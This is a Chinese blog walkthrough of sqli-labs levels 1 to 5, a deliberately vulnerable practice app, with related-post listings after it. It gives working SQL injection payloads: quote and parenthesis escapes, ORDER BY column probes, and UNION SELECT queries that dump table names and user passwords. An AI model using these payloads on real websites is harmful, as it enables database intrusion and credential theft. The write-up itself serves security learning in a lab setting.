sqli-labs(持续更新)

已于 2022-10-14 13:52:10 修改
阅读量246 收藏
点赞数 1
文章标签: sql 数据库
于 2022-10-11 22:22:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51262840/article/details/127272787
版权

目录

les-1 GET型 单引号字符型注入

less-2 GET型 整数型 注入

less-3 GET型 单引号变形字符

less-4 GET型 双引号注入

less-5 GET型 单引号字符型注入 双注入

les-1 GET型 单引号字符型注入

判断数字 还是 字符型

首先猜测是数字型还是字符型,

# 命令
/?id=1 and 1=1 --+ #数字型
/?id=1' and 1=1 --+ #字符型

如图发现字符型时页面出现变化,被当作sql语句执行故为字符型

数字型时

可以对比两张图篇无变化

字符型时

 

 

此时所输入的语句被当作sql语句执行

判断字段数

此时该判断注入点的字段数

# 命令
/?id=1' and orde by 4 --+
# 原理:当探测的字段数大于数据库已有的字段数时会报错

 如图

 当字段数探测的值大于,表内字段时,报错提示未知字段

爆破数据库

通过union联合注入,爆出数据库

# 命令
/?id=-1' union select 1,2,database() --+

 

 源码

 当爆破数据库名时,

$id就是我们注入的参数故
$id = 
$sql="SELECT * FROM users WHERE id='-1' union select 1,2,database() --+' LIMIT 0,1";
# 此时可以理解为
# '-1' 被数据库执行
# union 联合语句被数据库执行
# --+后面的的内容被全部注释掉

爆破数据库表名

# 命令
/?id=-1'  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 爆破字段名

# 命令
?id=-1'  union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

 爆破密码,用户

/?id=-1'  union select 1,2,group_concat(username,0x7e,password,0x7e) from security.users --+

less-2 GET型 整数型 注入

判断数字 还是字符型

还是同less1一样

# 命令
/?id=1 and 1=1 --+ #数字型
/?id=1' and 1=1 --+ #字符型

源码

# 原理
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
# 在数据库中整型,可以不加引号('1')  也可以正确的的识别

 爆破字段数

# 命令
/?id=1 and orde by 4 --+
# 原理:当探测的字段数大于数据库已有的字段数时会报错

后面的爆破数据库,表名,字段名等都同less-1相同

唯一区别 不需要带单引号

 

less-3 GET型 单引号变形字符

判断注入点

就是类似less-1和less-2的判断数字还是字符型

分析源码

 

# 变形添加了一个括号,在逃逸单引号时,同时把括号逃逸即可
# 输入参数后命令如下
$id = 1') order by 3  --+
$sql="SELECT * FROM users WHERE id=('1') order by 3  --+') LIMIT 0,1";
# ('1')正常执行  order by 正常执行   --+ 后面的内容被注释掉

判断确定注入点后

使用union联合注入同less-1相同的注入方式,主要改变的还时注入点的变化

less-4 GET型 双引号注入

判断注入点

还是先分析一下源码

如何将双引号和括号逃逸出来思考一下

# 命令参数
/Less-4/?id=1") order by 4 --+
# 当$id = 1") order by 4 --+
# 执行的sql语句:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=("1") order by 4 --+") LIMIT 0,1";
# 成功将sql双引号和小括号逃逸出来

确定注入点后

使用union联合注入同less-1相同的注入方式

less-5 GET型 单引号字符型注入 双注入

判断注入点

首先进行源码分析

mysql_query() 发送一个唯一的查询(多个查询 不支持)到当前 服务器上与 指定的 link_identifier.
参数 ¶
query
SQL 查询
查询字符串不应以分号结尾。 查询中的数据应 正确转义 。
link_identifier
MySQL 连接。 如果 未指定链接标识符,最后一个链接由 mysql_connect() 是假定的。 如果没有找到这样的链接,它 将尝试创建一个,就好像 mysql_connect() 已被调用 没有论据。 如果未找到或建立连接,则 E_WARNING产生电平错误。
qq_51262840
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-lab注入练习源码
06-25
本套源码sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
Sqli-Labs.zip
07-15
对前四道题目进行加强,输出在数据库中构成的查询语句,有利于新手快速入门SQLi;
sqli-labs-master-源码审计(less-1-7)
忘忧的博客
04-04 4235
less-1先看源码,查看重点代码,sql传参没有进过任何过滤 使用语句:单引号判断:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’判断字段:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’order by 4 --+判断注入位置:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,2,3 --+获取信息:http://127.0.0.1/
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
sqli-labs/Less:1-40源码中用到的函数
weixin_43733035的博客
02-09 303
1.include(file_path):file_path为文件的绝对路径 ,include可以快速调用路径指向的文件,使用include()函数可以剩下很多的步骤。 2.error_reporting(n):报错函数,可以进行报错,n值不同的时候可以返回不同的报错类型。 3.isset():检查是否为空,不为空返回true,为空返回false。 4.empty():检查一个变量是否为空。 5....
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
SQLI-LABS(Part 1)——搭建
qq_36609913的博客
11-24 927
搭建SQLI—LABS环境:1.从https://github.com/Audi-1/sqli-labs下载源码2.将源码放在web目录下 Mac下web项目根目录默认在/Library/WebServer/Documents Linux下web项目根目录默认在/var/www/ 在这里使用的为Mac Linux系统下大同小异mv sqli-labs-master /Library/
sqli-labs-book
03-26
sqli-labs-book
sqli-labs安装与调试
OAA123的博客
12-05 2264
sqli-labs源码https://github.com/Audi-1/sqli-labs,下完解压就行 我用的是phpstudy来配置数据库,地址:http://phpstudy.php.cn/ 把sqli-labs的源码复制到WWW文件夹下 启动phpstudy,按如图打开数据库,mysql要用5.x版本的,去软件管理下载 修改root密码,之后新建security数据库 之后修改mysql5.x的配置文件 按如图加入语句 skip-grant-tables 浏览器输入地址...
SQL注入靶场sqli-labs(1-6)
m0_49025459的博客
05-09 764
Less-1(基于错误的GET单引号字符型注入) 我们直接看看源码弄明白什么是单引号字符型注入 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id']))//判断GET获取的id不能为空 { $id=$_GET['id'];//让id=我
Sqli-labs 查看源代码 1-20
foolisheddy
03-08 4403
Less-1 indexphp sqli-connectphp db-credsinc GET - 基于错误 - 单引号 - 字符型 Less-2 GET - 基于错误 - 整型 Less-3 基于错误 - 单引号变形 - 字符型 Less-4 基于错误 -双引号- 字符型 Less-5 Less-6 双注入-双引号-字符型 Less-7 单引号 双括号 非基于错误 Less-8 基于布尔 - 单引
sqli-labs / DVWA靶场搭建
Goodric的博客
11-24 741
Sqli-labs / DVWA靶场搭建 为了更好地学习web网络安全知识,可以通过搭建靶场进行练习sql注入、xss等常见漏洞。 以下介绍sqli-labs和DVWA两种较常见的靶场搭建方法。 搭建靶场首先要有运行环境, phpstudy这个软件就十分方便,是一个程序集成包,包含PHP、Mysql、Apache。可直接在phpstudy官网进行下载。 下载好的phpstudy如图,运行时打开Apache和MySQL即可。 Sqli-labs靶场搭建 首先下载sqli-labs源码:https://gi
sql-labs(1~4)
qq_53142368的博客
03-13 2685
学习目标: sql-labs 靶场基础练习 学习内容: sql-labs 靶场1~4关 学习时间: 2021年3月7日~2021年3月13日 学习产出: 前言 说出来满满都是泪呀 /(ㄒoㄒ)/~~ 我的靶场一直搭建不好,tmd,PHP study下载好了,并且在db-creds.inc里的用户地址也改为了本地127.0.0.1(localhost) 但是在打开靶场,发现打不开题(知道有多难受么)知道最近才问学长,同学,才发现是自己的PHP study版本太高了,这里就又出现一个问题,哎,我下载了好几个版本
每个互联网人才都应该知道的 SQL 注入!
最新发布
yy1715713348的博客
11-08 90
我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非法的事,只是知道小偷怎么偷东西才能更好地防范。SQL 注入(SQL Injection),SQL 注入即是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。下面我们用 sqli-labs 这个开源项目来演示一下 SQL 注入盗取信息的全程。运行后打开。
sqli-labs第十八关~第二十二关
yuqnqi的博客
05-13 873
这几关均为请求头注入,请求头记录的信息可以拼接到SQL语句上,User-Agent ,浏览器身份标识字符串Referer,表示浏览器访问的前一个页面,可以认为是之前访问页面的连接件浏览器带到了当前页面Accept ,可接受的响应内容类型(Content-Type)X-Forwarded-For, 可以用来表示http请求真实IPDate,发送该消息的日期和时间第十八关暴库名爆表名爆字段名爆数据。
sqli-labs靶场搭建(Windows环境)
你还心动吗
02-01 1205
sqli-labs是一个印度程序员写的一个关于SQL注入的靶场,一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过。
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值